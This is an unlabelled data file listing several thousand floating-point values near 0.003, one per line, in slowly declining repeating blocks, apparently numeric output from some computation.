0.00316662
0.00317207
0.00316648
0.00316671
0.00316659
0.00317178
0.00317178
0.00317206
0.00316632
0.00316632
0.00316074
0.00315517
0.0031607
0.00315541
0.00316054
0.00315541
0.00316072
0.00316074
0.00315517
0.0031607
0.00315541
0.00316054
0.00315541
0.00316071
0.00313799
0.00314383
0.00313799
0.00314383
0.00314403
0.00314917
0.00314917
0.00314945
0.00314376
0.00314376
0.00313824
0.00313296
0.00313819
0.00313272
0.00313803
0.00313821
0.00313296
0.00313824
0.00313296
0.00313819
0.00313272
0.00313803
0.00313821
0.00313296
0.00314416
0.00314926
0.00314944
0.00314406
0.00314947
0.00314392
0.00314416
0.00314416
0.00314926
0.00314944
0.00314406
0.00314947
0.00314392
0.00314416
0.00313822
0.00313255
0.00313255
0.00313794
0.00313794
0.00313283
0.00316053
0.00316069
0.00315514
0.00315531
0.00316055
0.00316069
0.00315512
0.00316627
0.00317203
0.00316648
0.00317172
0.00316659
0.00316643
0.00316662
0.00317188
0.00317202
0.00316645
0.00317186
0.00316661
0.00316039
0.00315528
0.00316056
0.0031607
0.00315496
0.00314387
0.00314926
0.00314941
0.00314406
0.00314926
0.00314389
0.00314405
0.00313789
0.00313806
0.00313283
0.00313251
0.00313819
0.00314371
0.00314942
0.00314393
0.00314911
0.00314403
0.00313803
0.00313818
0.00313268
0.00313285
0.00313266
0.00313803
0.00313818
0.00314387
0.00314926
0.00314941
0.00314406
0.00314925
0.00314389
0.00314405
0.00313789
0.00313806
0.00313282
0.00313819
0.00313251
0.00314371
0.00314942
0.00314393
0.00314911
0.00314403
0.00313803
0.00313818
0.00313268
0.00313285
0.00313803
0.00313818
0.00313266
0.00316072
0.00315501
0.00315501
0.00316044
0.00316044
0.00315529
0.00316671
0.00317204
0.00317186
0.00316662
0.00316648
0.00317207
0.00316671
0.00316671
0.00317204
0.00317186
0.00316662
0.00316671
0.00317207
0.00316648
0.00316659
0.00317178
0.00317178
0.00316632
0.00317206
0.00316632
0.00316074
0.00315517
0.0031607
0.00315541
0.00316053
0.00316072
0.00315541
0.00316074
0.00315517
0.0031607
0.00315541
0.00316071
0.00316054
0.00315541
0.00316638
0.00316049
0.00313799
0.00314383
0.00314403
0.00314917
0.00314917
0.00314944
0.00314376
0.00314376
0.00313824
0.00313296
0.00313819
0.00313272
0.00313821
0.00313803
0.00313296
0.00313824
0.00313296
0.00313819
0.00313272
0.00313803
0.00313821
0.00313296
0.00314416
0.00314926
0.00314944
0.00314406
0.00314416
0.00314947
0.00314392
0.00314416
0.00314926
0.00314944
0.00314406
0.00314947
0.00314392
0.00314416
0.00313821
0.00313255
0.00313255
0.00313794
0.00313794
0.00313283
0.00313799
0.00314383
0.00316053
0.00316069
0.00315514
0.00315531
0.00316055
0.00316069
0.00315513
0.00316627
0.00317203
0.00316648
0.00317172
0.00316659
0.00316643
0.00316662
0.00317188
0.00317202
0.00316645
0.00317186
0.00316661
0.00316039
0.00315528
0.00316056
0.0031607
0.00315496
0.00314387
0.00314941
0.00314926
0.00314406
0.00314925
0.00314405
0.00314389
0.00313789
0.00313806
0.00313282
0.00313251
0.00313819
0.00314371
0.00314942
0.00314393
0.00314911
0.00314403
0.00313803
0.00313818
0.00313285
0.00313268
0.00313266
0.00313818
0.00313803
0.00314387
0.00314926
0.00314941
0.00314406
0.00314925
0.00314389
0.00314405
0.00313789
0.00313806
0.00313282
0.00313819
0.00313251
0.00314371
0.00314941
0.00314392
0.00314911
0.00314403
0.00313803
0.00313818
0.00313268
0.00313285
0.00313803
0.00313818
0.00313266
0.00316053
0.00316069
0.00315531
0.00315514
0.00316069
0.00316055
0.00315512
0.00316627
0.00317203
0.00316648
0.00316659
0.00317172
0.00316643
0.00316662
0.00317202
0.00317188
0.00316661
0.00317186
0.00316645
0.00316039
0.00315528
0.00316056
0.0031607
0.00315496
0.00316053
0.00316069
0.00315514
0.00315531
0.00316054
0.00316069
0.00315512
0.00316627
0.00317203
0.00316648
0.00317172
0.00316659
0.00316643
0.00316662
0.00317188
0.00317202
0.00317186
0.00316645
0.00316661
0.00316039
0.00315528
0.00316056
0.0031607
0.00315496
0.00314387
0.00314941
0.00314926
0.00314406
0.00314925
0.00314405
0.00314389
0.00313789
0.00313806
0.00313282
0.00313819
0.00313251
0.00314371
0.00314942
0.00314392
0.00314911
0.00314403
0.00313803
0.00313818
0.00313284
0.00313268
0.00313818
0.00313803
0.00313266
0.00314387
0.00314926
0.00314941
0.00314406
0.00314925
0.00314389
0.00314405
0.00313789
0.00313806
0.00313282
0.00313819
0.00313251
0.00314371
0.00314941
0.00314392
0.00314911
0.00314403
0.00313803
0.00313818
0.00313268
0.00313284
0.00313803
0.00313818
0.00313266
0.00316072
0.00315501
0.00315501
0.00316044
0.00316044
0.00315529
0.00316671
0.00317204
0.00317186
0.00316662
0.00316648
0.00317207
0.00316671
0.00316671
0.00317204
0.00317186
0.00316662
0.00316671
0.00317207
0.00316648
0.00316659
0.00317178
0.00317178
0.00316632
0.00317206
0.00316632
0.00316074
0.00315517
0.0031607
0.00315541
0.00316053
0.00316071
0.00315541
0.00316074
0.00315517
0.0031607
0.0031554
0.00316071
0.00316053
0.00315541
0.00316638
0.00316049
0.00313799
0.00314383
0.00314403
0.00314917
0.00314917
0.00314944
0.00314376
0.00314376
0.00313824
0.00313295
0.00313819
0.00313272
0.00313821
0.00313803
0.00313296
0.00313824
0.00313295
0.00313819
0.00313272
0.00313803
0.00313821
0.00313296
0.00314416
0.00314926
0.00314944
0.00314406
0.00314416
0.00314947
0.00314392
0.00314416
0.00314926
0.00314944
0.00314406
0.00314947
0.00314392
0.00314415
0.00313821
0.00313255
0.00313255
0.00313794
0.00313794
0.00313282
0.00313799
0.00314383
0.00316053
0.00316069
0.00315531
0.00315514
0.00316069
0.00316054
0.00315512
0.00316627
0.00317203
0.00316648
0.00316659
0.00317172
0.00316643
0.00316662
0.00317202
0.00317188
0.00316661
0.00317186
0.00316645
0.00316039
0.00315528
0.00316056
0.0031607
0.00315496
0.00316053
0.00316069
0.00315531
0.00315514
0.00316069
0.00316054
0.00315512
0.00316627
0.00317203
0.00316648
0.00317172
0.00316659
0.00316643
0.00316662
0.00317202
0.00317188
0.00317186
0.00316661
0.00316645
0.00316039
0.00315528
0.00316056
0.00316069
0.00315496
0.00314387
0.00314941
0.00314926
0.00314405
0.00314925
0.00314405
0.00314389
0.00313789
0.00313806
0.00313282
0.00313819
0.00313251
0.00314371
0.00314941
0.00314392
0.00314911
0.00314403
0.00313802
0.00313818
0.00313284
0.00313268
0.00313818
0.00313803
0.00313266
0.00314387
0.00314941
0.00314926
0.00314405
0.00314925
0.00314405
0.00314389
0.00313789
0.00313806
0.00313282
0.00313819
0.00313251
0.00314371
0.00314941
0.00314392
0.00314911
0.00314403
0.00313803
0.00313818
0.00313284
0.00313268
0.00313818
0.00313803
0.00313266
0.00316638
0.00316049
0.00316638
0.00316049
0.00314403
0.00314916
0.00314916
0.00314944
0.00314376
0.00314376
0.00313824
0.00313295
0.00313819
0.00313272
0.00313296
0.00313821
0.00313803
0.00313824
0.00313295
0.00313819
0.00313272
0.00313296
0.00313821
0.00313803
0.00314416
0.00314926
0.00314944
0.00314406
0.00314946
0.00314415
0.00314392
0.00314416
0.00314926
0.00314944
0.00314406
0.00314946
0.00314415
0.00314392
0.00313821
0.00313255
0.00313255
0.00313282
0.00313794
0.00313794
0.00313799
0.00314383
0.00313799
0.00314383
0.00312147
0.00311568
0.00312147
0.00311568
0.00311589
0.00311028
0.00311028
0.00311563
0.00311563
0.00311054
0.0031218
0.00312703
0.00312685
0.00312169
0.00312706
0.00312157
0.0031218
0.0031218
0.00312703
0.00312685
0.00312169
0.00312706
0.00312156
0.0031218
0.00312166
0.00312676
0.00312676
0.00312703
0.0031214
0.0031214
0.00311593
0.00311046
0.00311587
0.00311069
0.00311572
0.00311069
0.0031159
0.00311593
0.00311045
0.00311587
0.00311069
0.00311572
0.00311069
0.0031159
0.00309354
0.0030993
0.00309353
0.00309928
0.00309947
0.00310454
0.00310453
0.0031048
0.00309921
0.00309921
0.00309378
0.00308858
0.00309372
0.00308834
0.00309358
0.00309375
0.00308857
0.00309377
0.00308858
0.00309372
0.00308835
0.00309358
0.00309375
0.00308858
0.00309962
0.00310463
0.00310481
0.00309951
0.00310483
0.00309939
0.00309962
0.00309961
0.00310463
0.00310481
0.0030995
0.00310483
0.00309938
0.00309962
0.00309374
0.00308818
0.00308818
0.00309349
0.00309348
0.00308842
0.0031157
0.00311585
0.0031104
0.00311057
0.00311571
0.00311586
0.00311038
0.00312136
0.003127
0.00312156
0.00312671
0.00312166
0.0031215
0.00312169
0.00312685
0.00312699
0.00312152
0.00312684
0.00312169
0.00311558
0.00311055
0.00311575
0.00311587
0.00311025
0.00309931
0.00310461
0.00310476
0.00309949
0.00310461
0.00309932
0.0030995
0.00309344
0.0030936
0.00308843
0.00308815
0.00309372
0.00309918
0.00310477
0.00309938
0.00310449
0.00309947
0.00309356
0.0030937
0.00308829
0.00308846
0.00308828
0.00309356
0.00309371
0.00309931
0.00310461
0.00310476
0.00309949
0.00310461
0.00309932
0.00309949
0.00309344
0.0030936
0.00308843
0.00309372
0.00308815
0.00309918
0.00310477
0.00309938
0.00310449
0.00309947
0.00309356
0.0030937
0.00308829
0.00308846
0.00309356
0.00309371
0.00308827
0.00311589
0.00311028
0.00311028
0.00311563
0.00311563
0.00311054
0.0031218
0.00312703
0.00312685
0.00312169
0.00312156
0.00312706
0.0031218
0.0031218
0.00312703
0.00312685
0.00312169
0.0031218
0.00312706
0.00312157
0.00312166
0.00312676
0.00312676
0.0031214
0.00312703
0.0031214
0.00311592
0.00311045
0.00311587
0.00311069
0.00311572
0.0031159
0.00311069
0.00311592
0.00311045
0.00311586
0.00311069
0.0031159
0.00311572
0.00311069
0.00312147
0.00311568
0.00309353
0.00309928
0.00309946
0.00310453
0.00310453
0.00310479
0.00309921
0.00309921
0.00309377
0.00308858
0.00309371
0.00308835
0.00309375
0.00309357
0.00308858
0.00309377
0.00308858
0.00309371
0.00308835
0.00309358
0.00309375
0.00308858
0.00309961
0.00310463
0.0031048
0.0030995
0.00309962
0.00310483
0.00309938
0.00309961
0.00310463
0.0031048
0.0030995
0.00310483
0.00309938
0.00309961
0.00309374
0.00308818
0.00308818
0.00309348
0.00309348
0.00308842
0.00309353
0.00309928
0.0031157
0.00311585
0.0031104
0.00311057
0.00311571
0.00311586
0.00311038
0.00312136
0.003127
0.00312156
0.00312671
0.00312166
0.0031215
0.00312168
0.00312685
0.00312699
0.00312152
0.00312684
0.00312168
0.00311558
0.00311055
0.00311575
0.00311587
0.00311025
0.00309931
0.00310476
0.00310461
0.00309949
0.00310461
0.00309949
0.00309932
0.00309344
0.0030936
0.00308843
0.00308815
0.00309372
0.00309918
0.00310477
0.00309938
0.00310449
0.00309947
0.00309356
0.0030937
0.00308846
0.00308829
0.00308827
0.00309371
0.00309356
0.00309931
0.00310461
0.00310476
0.00309949
0.00310461
0.00309932
0.0030995
0.00309344
0.0030936
0.00308843
0.00309372
0.00308815
0.00309918
0.00310477
0.00309938
0.00310449
0.00309947
0.00309356
0.0030937
0.00308829
0.00308846
0.00309356
0.00309371
0.00308828
0.0031157
0.00311585
0.00311057
0.0031104
0.00311586
0.00311571
0.00311038
0.00312136
0.003127
0.00312156
0.00312166
0.00312671
0.0031215
0.00312168
0.00312699
0.00312685
0.00312168
0.00312684
0.00312152
0.00311558
0.00311055
0.00311575
0.00311587
0.00311025
0.0031157
0.00311585
0.0031104
0.00311057
0.00311571
0.00311586
0.00311038
0.00312136
0.003127
0.00312156
0.00312671
0.00312166
0.0031215
0.00312168
0.00312685
0.00312699
0.00312684
0.00312152
0.00312168
0.00311558
0.00311055
0.00311574
0.00311587
0.00311025
0.00309931
0.00310476
0.00310461
0.00309949
0.00310461
0.00309949
0.00309932
0.00309344
0.0030936
0.00308843
0.00309372
0.00308815
0.00309918
0.00310477
0.00309938
0.00310449
0.00309947
0.00309356
0.0030937
0.00308846
0.00308829
0.00309371
0.00309356
0.00308827
0.00309931
0.00310461
0.00310476
0.00309949
0.00310461
0.00309932
0.00309949
0.00309344
0.0030936
0.00308843
0.00309372
0.00308815
0.00309918
0.00310477
0.00309938
0.00310449
0.00309947
0.00309356
0.0030937
0.00308829
0.00308846
0.00309356
0.00309371
0.00308827
0.00311589
0.00311028
0.00311028
0.00311562
0.00311562
0.00311054
0.0031218
0.00312703
0.00312685
0.00312169
0.00312156
0.00312706
0.0031218
0.0031218
0.00312703
0.00312685
0.00312169
0.0031218
0.00312706
0.00312156
0.00312166
0.00312676
0.00312676
0.0031214
0.00312703
0.0031214
0.00311592
0.00311045
0.00311586
0.00311069
0.00311572
0.0031159
0.00311069
0.00311592
0.00311045
0.00311586
0.00311069
0.0031159
0.00311572
0.00311069
0.00312147
0.00311568
0.00309353
0.00309928
0.00309946
0.00310453
0.00310453
0.00310479
0.00309921
0.00309921
0.00309377
0.00308858
0.00309371
0.00308835
0.00309375
0.00309357
0.00308858
0.00309377
0.00308858
0.00309371
0.00308835
0.00309357
0.00309375
0.00308858
0.00309961
0.00310463
0.0031048
0.0030995
0.00309962
0.00310483
0.00309938
0.00309961
0.00310463
0.0031048
0.0030995
0.00310483
0.00309938
0.00309961
0.00309373
0.00308818
0.00308818
0.00309348
0.00309348
0.00308842
0.00309353
0.00309928
0.0031157
0.00311585
0.00311057
0.0031104
0.00311586
0.00311571
0.00311038
0.00312136
0.003127
0.00312156
0.00312166
0.00312671
0.0031215
0.00312168
0.00312699
0.00312685
0.00312168
0.00312684
0.00312152
0.00311558
0.00311055
0.00311575
0.00311587
0.00311025
0.0031157
0.00311585
0.00311057
0.0031104
0.00311586
0.00311571
0.00311038
0.00312136
0.003127
0.00312156
0.00312671
0.00312166
0.0031215
0.00312168
0.00312699
0.00312685
0.00312684
0.00312168
0.00312152
0.00311558
0.00311055
0.00311575
0.00311587
0.00311025
0.00309931
0.00310476
0.00310461
0.00309949
0.00310461
0.00309949
0.00309932
0.00309344
0.0030936
0.00308843
0.00309372
0.00308815
0.00309918
0.00310477
0.00309938
0.00310449
0.00309947
0.00309356
0.0030937
0.00308846
0.00308829
0.00309371
0.00309356
0.00308827
0.00309931
0.00310476
0.00310461
0.00309949
0.00310461
0.00309949
0.00309932
0.00309344
0.0030936
0.00308843
0.00309372
0.00308815
0.00309918
0.00310477
0.00309938
0.00310449
0.00309947
0.00309356
0.0030937
0.00308846
0.00308829
0.00309371
0.00309356
0.00308827
0.00312147
0.00311568
0.00312147
0.00311568
0.00309946
0.00310453
0.00310453
0.00310479
0.00309921
0.00309921
0.00309377
0.00308858
0.00309371
0.00308835
0.00308858
0.00309375
0.00309357
0.00309377
0.00308858
0.00309371
0.00308835
0.00308858
0.00309375
0.00309357
0.00309961
0.00310463
0.0031048
0.0030995
0.00310483
0.00309961
0.00309938
0.00309961
0.00310463
0.0031048
0.0030995
0.00310483
0.00309961
0.00309938
0.00309373
0.00308818
0.00308818
0.00308842
0.00309348
0.00309348
0.00309353
0.00309928
0.00309353
0.00309928
0.00307725
0.00307154
0.00307725
0.00307154
0.00307173
0.00306623
0.00306623
0.0030715
0.0030715
0.00306646
0.00307758
0.00308273
0.00308255
0.00307746
0.00308275
0.00307735
0.00307759
0.00307758
0.00308274
0.00308256
0.00307746
0.00308275
0.00307735
0.00307759
0.00307742
0.00308247
0.00308247
0.00308271
0.00307718
0.00307718
0.00307177
0.00306639
0.00307172
0.00306663
0.00307158
0.00306661
0.00307176
0.00307177
0.00306639
0.00307171
0.00306663
0.00307158
0.00306661
0.00307176
0.00304969
0.00305537
0.00304969
0.00305537
0.00305552
0.00306056
0.00306055
0.00306078
0.0030553
0.0030553
0.00304992
0.00304481
0.00304986
0.00304457
0.00304973
0.00304991
0.00304479
0.00304992
0.00304481
0.00304986
0.00304457
0.00304973
0.00304991
0.00304479
0.00305569
0.00306064
0.00306082
0.00305557
0.00306083
0.00305546
0.0030557
0.00305569
0.00306064
0.00306082
0.00305557
0.00306083
0.00305546
0.0030557
0.00304987
0.00304442
0.00304442
0.00304965
0.00304965
0.00304463
0.00307156
0.00307171
0.00306633
0.0030665
0.00307157
0.00307171
0.00306631
0.00307716
0.0030827
0.00307735
0.00308243
0.00307743
0.00307727
0.00307746
0.00308255
0.00308269
0.0030773
0.00308254
0.00307746
0.00307146
0.00306647
0.00307161
0.00307172
0.0030662
0.00305539
0.00306063
0.00306077
0.00305557
0.00306062
0.00305541
0.00305557
0.00304962
0.00304976
0.00304465
0.00304439
0.00304986
0.00305528
0.00306077
0.00305546
0.00306052
0.00305554
0.00304971
0.00304985
0.00304452
0.00304468
0.0030445
0.00304972
0.00304986
0.00305539
0.00306063
0.00306077
0.00305557
0.00306062
0.00305541
0.00305557
0.00304962
0.00304976
0.00304464
0.00304986
0.00304439
0.00305528
0.00306077
0.00305546
0.00306052
0.00305554
0.00304971
0.00304985
0.00304452
0.00304468
0.00304972
0.00304986
0.0030445
0.00307173
0.00306623
0.00306623
0.0030715
0.0030715
0.00306646
0.00307758
0.00308274
0.00308256
0.00307746
0.00307735
0.00308275
0.00307759
0.00307758
0.00308274
0.00308256
0.00307746
0.00307759
0.00308275
0.00307735
0.00307742
0.00308247
0.00308247
0.00307718
0.00308271
0.00307719
0.00307177
0.00306639
0.00307172
0.00306663
0.00307158
0.00307176
0.00306661
0.00307177
0.00306639
0.00307171
0.00306663
0.00307176
0.00307158
0.00306662
0.00307725
0.00307154
0.00304969
0.00305537
0.00305552
0.00306056
0.00306056
0.00306078
0.0030553
0.00305531
0.00304992
0.00304481
0.00304986
0.00304457
0.00304991
0.00304973
0.00304479
0.00304992
0.00304481
0.00304986
0.00304457
0.00304973
0.00304991
0.00304479
0.00305569
0.00306064
0.00306082
0.00305557
0.0030557
0.00306083
0.00305546
0.00305569
0.00306064
0.00306082
0.00305557
0.00306083
0.00305546
0.0030557
0.00304987
0.00304442
0.00304442
0.00304965
0.00304965
0.00304463
0.00304969
0.00305537
0.00307156
0.00307171
0.00306634
0.0030665
0.00307157
0.00307171
0.00306631
0.00307716
0.0030827
0.00307735
0.00308243
0.00307743
0.00307727
0.00307746
0.00308255
0.00308269
0.0030773
0.00308254
0.00307746
0.00307146
0.00306647
0.00307161
0.00307172
0.0030662
0.00305539
0.00306077
0.00306063
0.00305557
0.00306062
0.00305557
0.00305541
0.00304962
0.00304976
0.00304465
0.00304439
0.00304986
0.00305528
0.00306077
0.00305546
0.00306052
0.00305554
0.00304971
0.00304986
0.00304468
0.00304452
0.0030445
0.00304986
0.00304972
0.00305539
0.00306063
0.00306077
0.00305557
0.00306062
0.00305541
0.00305558
0.00304962
0.00304976
0.00304465
0.00304986
0.00304439
0.00305528
0.00306077
0.00305546
0.00306052
0.00305554
0.00304971
0.00304986
0.00304452
0.00304468
0.00304972
0.00304986
0.0030445
0.00307156
0.00307171
0.0030665
0.00306633
0.00307171
0.00307157
0.00306631
0.00307716
0.0030827
0.00307735
0.00307743
0.00308243
0.00307728
0.00307746
0.00308269
0.00308255
0.00307746
0.00308254
0.0030773
0.00307146
0.00306647
0.00307161
0.00307172
0.0030662
0.00307156
0.00307171
0.00306633
0.0030665
0.00307157
0.00307171
0.00306631
0.00307716
0.0030827
0.00307735
0.00308243
0.00307743
0.00307728
0.00307746
0.00308255
0.00308269
0.00308254
0.0030773
0.00307746
0.00307146
0.00306647
0.00307161
0.00307172
0.0030662
0.00305539
0.00306077
0.00306063
0.00305557
0.00306062
0.00305557
0.00305541
0.00304962
0.00304976
0.00304465
0.00304986
0.00304439
0.00305528
0.00306077
0.00305546
0.00306052
0.00305554
0.00304971
0.00304986
0.00304468
0.00304452
0.00304986
0.00304972
0.0030445
0.00305539
0.00306063
0.00306077
0.00305557
0.00306062
0.00305541
0.00305557
0.00304962
0.00304976
0.00304465
0.00304986
0.0030444
0.00305528
0.00306077
0.00305546
0.00306052
0.00305554
0.00304971
0.00304986
0.00304452
0.00304468
0.00304972
0.00304986
0.0030445
0.00307173
0.00306623
0.00306623
0.0030715
0.0030715
0.00306646
0.00307758
0.00308274
0.00308256
0.00307746
0.00307735
0.00308275
0.00307759
0.00307758
0.00308274
0.00308256
0.00307746
0.00307759
0.00308275
0.00307735
0.00307742
0.00308247
0.00308247
0.00307719
0.00308271
0.00307718
0.00307177
0.00306639
0.00307172
0.00306663
0.00307158
0.00307176
0.00306661
0.00307177
0.00306639
0.00307172
0.00306663
0.00307176
0.00307158
0.00306661
0.00307725
0.00307154
0.00304969
0.00305537
0.00305552
0.00306056
0.00306056
0.00306078
0.00305531
0.0030553
0.00304992
0.00304481
0.00304986
0.00304457
0.00304991
0.00304973
0.00304479
0.00304992
0.00304481
0.00304986
0.00304457
0.00304973
0.00304991
0.00304479
0.00305569
0.00306064
0.00306082
0.00305557
0.0030557
0.00306083
0.00305546
0.00305569
0.00306064
0.00306082
0.00305557
0.00306083
0.00305546
0.0030557
0.00304987
0.00304442
0.00304442
0.00304965
0.00304965
0.00304463
0.0030497
0.00305537
0.00307156
0.00307171
0.0030665
0.00306634
0.00307171
0.00307157
0.00306631
0.00307716
0.0030827
0.00307735
0.00307743
0.00308243
0.00307727
0.00307746
0.00308269
0.00308255
0.00307746
0.00308254
0.00307729
0.00307146
0.00306647
0.00307161
0.00307172
0.0030662
0.00307156
0.00307171
0.0030665
0.00306634
0.00307171
0.00307157
0.00306631
0.00307716
0.0030827
0.00307735
0.00308243
0.00307743
0.00307727
0.00307746
0.00308269
0.00308255
0.00308254
0.00307746
0.0030773
0.00307146
0.00306647
0.00307161
0.00307172
0.0030662
0.00305539
0.00306077
0.00306063
0.00305557
0.00306062
0.00305557
0.00305541
0.00304962
0.00304976
0.00304465
0.00304986
0.00304439
0.00305528
0.00306077
0.00305546
0.00306052
0.00305554
0.00304971
0.00304986
0.00304468
0.00304452
0.00304986
0.00304972
0.0030445
0.00305539
0.00306077
0.00306063
0.00305557
0.00306062
0.00305557
0.00305541
0.00304962
0.00304976
0.00304465
0.00304986
0.0030444
0.00305528
0.00306077
0.00305546
0.00306052
0.00305554
0.00304971
0.00304986
0.00304468
0.00304452
0.00304986
0.00304972
0.0030445
0.00307725
0.00307154
0.00307725
0.00307154
0.00305552
0.00306056
0.00306056
0.00306078
0.0030553
0.00305531
0.00304992
0.00304481
0.00304986
0.00304457
0.00304479
0.00304991
0.00304973
0.00304992
0.00304481
0.00304986
0.00304457
0.00304479
0.00304991
0.00304973
0.00305569
0.00306064
0.00306082
0.00305557
0.00306083
0.0030557
0.00305546
0.00305569
0.00306064
0.00306082
0.00305557
0.00306083
0.0030557
0.00305546
0.00304987
0.00304442
0.00304442
0.00304463
0.00304965
0.00304965
0.00304969
0.00305537
0.00304969
0.00305537
0.00303362
0.00302798
0.00303362
0.00302798
0.00302814
0.00302273
0.00302273
0.00302794
0.00302794
0.00302293
0.00303393
0.00303903
0.00303885
0.00303382
0.00303904
0.00303371
0.00303395
0.00303393
0.00303903
0.00303885
0.00303382
0.00303904
0.00303371
0.00303395
0.00303376
0.00303878
0.00303878
0.00303899
0.00303356
0.00303356
0.00302819
0.00302288
0.00302814
0.00302313
0.00302801
0.0030231
0.00302819
0.00302819
0.00302288
0.00302814
0.00302313
0.00302801
0.0030231
0.00302819
0.00300639
0.003012
0.00300639
0.003012
0.00301212
0.00301713
0.00301713
0.00301732
0.00301194
0.00301194
0.00300659
0.00300156
0.00300654
0.00300131
0.00300642
0.0030066
0.00300152
0.00300659
0.00300157
0.00300654
0.00300131
0.00300642
0.0030066
0.00300153
0.0030123
0.0030172
0.00301738
0.00301219
0.00301737
0.00301208
0.00301233
0.0030123
0.0030172
0.00301738
0.00301219
0.00301737
0.00301208
0.00301233
0.00300654
0.00300117
0.00300117
0.00300635
0.00300635
0.00300135
0.00302799
0.00302814
0.00302283
0.00302299
0.003028
0.00302814
0.00302281
0.00303354
0.00303898
0.00303371
0.00303875
0.00303378
0.00303364
0.00303382
0.00303885
0.00303898
0.00303366
0.00303883
0.00303382
0.00302791
0.00302295
0.00302804
0.00302813
0.00302272
0.00301201
0.00301719
0.00301733
0.0030122
0.00301718
0.00301203
0.0030122
0.00300633
0.00300645
0.00300138
0.00300116
0.00300653
0.00301193
0.00301732
0.00301208
0.0030171
0.00301215
0.0030064
0.00300654
0.00300126
0.00300143
0.00300124
0.00300641
0.00300655
0.00301201
0.00301719
0.00301733
0.0030122
0.00301718
0.00301203
0.0030122
0.00300633
0.00300645
0.00300138
0.00300653
0.00300116
0.00301193
0.00301732
0.00301208
0.0030171
0.00301215
0.0030064
0.00300654
0.00300126
0.00300143
0.00300641
0.00300655
0.00300124
0.00302814
0.00302273
0.00302273
0.00302794
0.00302794
0.00302293
0.00303393
0.00303903
0.00303885
0.00303382
0.00303371
0.00303904
0.00303395
0.00303393
0.00303903
0.00303885
0.00303382
0.00303395
0.00303904
0.00303371
0.00303376
0.00303878
0.00303878
0.00303356
0.00303899
0.00303356
0.00302819
0.00302288
0.00302814
0.00302313
0.00302801
0.00302819
0.0030231
0.00302819
0.00302288
0.00302814
0.00302313
0.00302819
0.00302801
0.0030231
0.00303362
0.00302798
0.00300639
0.003012
0.00301212
0.00301713
0.00301713
0.00301732
0.00301194
0.00301194
0.00300659
0.00300157
0.00300654
0.00300131
0.0030066
0.00300642
0.00300153
0.00300659
0.00300157
0.00300654
0.00300131
0.00300642
0.0030066
0.00300153
0.0030123
0.0030172
0.00301738
0.00301219
0.00301233
0.00301737
0.00301208
0.0030123
0.0030172
0.00301738
0.00301219
0.00301737
0.00301208
0.00301233
0.00300654
0.00300117
0.00300117
0.00300635
0.00300635
0.00300135
0.00300639
0.003012
0.00302799
0.00302814
0.00302283
0.00302299
0.00302801
0.00302814
0.00302281
0.00303354
0.00303898
0.00303371
0.00303875
0.00303378
0.00303364
0.00303382
0.00303885
0.00303898
0.00303366
0.00303884
0.00303382
0.00302791
0.00302295
0.00302804
0.00302813
0.00302272
0.00301201
0.00301733
0.00301719
0.0030122
0.00301718
0.0030122
0.00301203
0.00300633
0.00300645
0.00300138
0.00300116
0.00300654
0.00301193
0.00301732
0.00301208
0.0030171
0.00301215
0.0030064
0.00300655
0.00300143
0.00300126
0.00300124
0.00300655
0.00300641
0.00301201
0.00301719
0.00301733
0.0030122
0.00301718
0.00301203
0.0030122
0.00300633
0.00300645
0.00300138
0.00300653
0.00300116
0.00301193
0.00301732
0.00301208
0.0030171
0.00301215
0.0030064
0.00300655
0.00300126
0.00300143
0.00300641
0.00300655
0.00300124
0.00302799
0.00302814
0.00302299
0.00302283
0.00302814
0.003028
0.00302281
0.00303354
0.00303898
0.00303371
0.00303378
0.00303875
0.00303364
0.00303382
0.00303899
0.00303885
0.00303382
0.00303884
0.00303366
0.00302791
0.00302295
0.00302804
0.00302814
0.00302272
0.00302799
0.00302814
0.00302283
0.00302299
0.003028
0.00302814
0.00302281
0.00303354
0.00303898
0.00303371
0.00303875
0.00303378
0.00303364
0.00303382
0.00303885
0.00303899
0.00303884
0.00303366
0.00303382
0.00302791
0.00302295
0.00302804
0.00302814
0.00302272
0.00301201
0.00301733
0.00301719
0.0030122
0.00301718
0.0030122
0.00301203
0.00300633
0.00300645
0.00300138
0.00300654
0.00300116
0.00301193
0.00301732
0.00301208
0.0030171
0.00301215
0.0030064
0.00300655
0.00300143
0.00300126
0.00300655
0.00300641
0.00300124
0.00301201
0.00301719
0.00301733
0.0030122
0.00301718
0.00301203
0.0030122
0.00300633
0.00300645
0.00300138
0.00300654
0.00300116
0.00301193
0.00301732
0.00301208
0.0030171
0.00301215
0.0030064
0.00300655
0.00300126
0.00300143
0.00300641
0.00300655
0.00300124
0.00302814
0.00302273
0.00302273
0.00302794
0.00302794
0.00302293
0.00303393
0.00303903
0.00303885
0.00303382
0.00303371
0.00303904
0.00303395
0.00303393
0.00303903
0.00303885
0.00303382
0.00303395
0.00303904
0.00303371
0.00303376
0.00303878
0.00303878
0.00303356
0.00303899
0.00303356
0.00302819
0.00302288
0.00302814
0.00302313
0.00302801
0.00302819
0.0030231
0.00302819
0.00302288
0.00302814
0.00302313
0.00302819
0.00302801
0.0030231
0.00303362
0.00302798
0.00300639
0.003012
0.00301213
0.00301713
0.00301713
0.00301732
0.00301194
0.00301194
0.00300659
0.00300157
0.00300654
0.00300131
0.0030066
0.00300642
0.00300153
0.00300659
0.00300157
0.00300654
0.00300131
0.00300642
0.0030066
0.00300153
0.0030123
0.0030172
0.00301738
0.00301219
0.00301233
0.00301737
0.00301208
0.0030123
0.0030172
0.00301738
0.00301219
0.00301737
0.00301208
0.00301233
0.00300654
0.00300117
0.00300117
0.00300635
0.00300635
0.00300135
0.00300639
0.003012
0.00302799
0.00302814
0.00302299
0.00302283
0.00302814
0.00302801
0.00302281
0.00303354
0.00303898
0.00303371
0.00303378
0.00303875
0.00303364
0.00303382
0.00303899
0.00303885
0.00303382
0.00303884
0.00303366
0.00302791
0.00302295
0.00302804
0.00302814
0.00302272
0.00302799
0.00302814
0.00302299
0.00302283
0.00302814
0.00302801
0.00302281
0.00303354
0.00303898
0.00303371
0.00303875
0.00303378
0.00303364
0.00303382
0.00303899
0.00303885
0.00303884
0.00303382
0.00303366
0.00302791
0.00302295
0.00302804
0.00302814
0.00302272
0.00301201
0.00301733
0.00301719
0.0030122
0.00301718
0.0030122
0.00301203
0.00300633
0.00300645
0.00300138
0.00300654
0.00300117
0.00301193
0.00301732
0.00301208
0.0030171
0.00301215
0.0030064
0.00300655
0.00300143
0.00300127
0.00300655
0.00300641
0.00300124
0.00301201
0.00301733
0.00301719
0.0030122
0.00301718
0.0030122
0.00301203
0.00300633
0.00300645
0.00300138
0.00300654
0.00300117
0.00301193
0.00301732
0.00301208
0.0030171
0.00301215
0.0030064
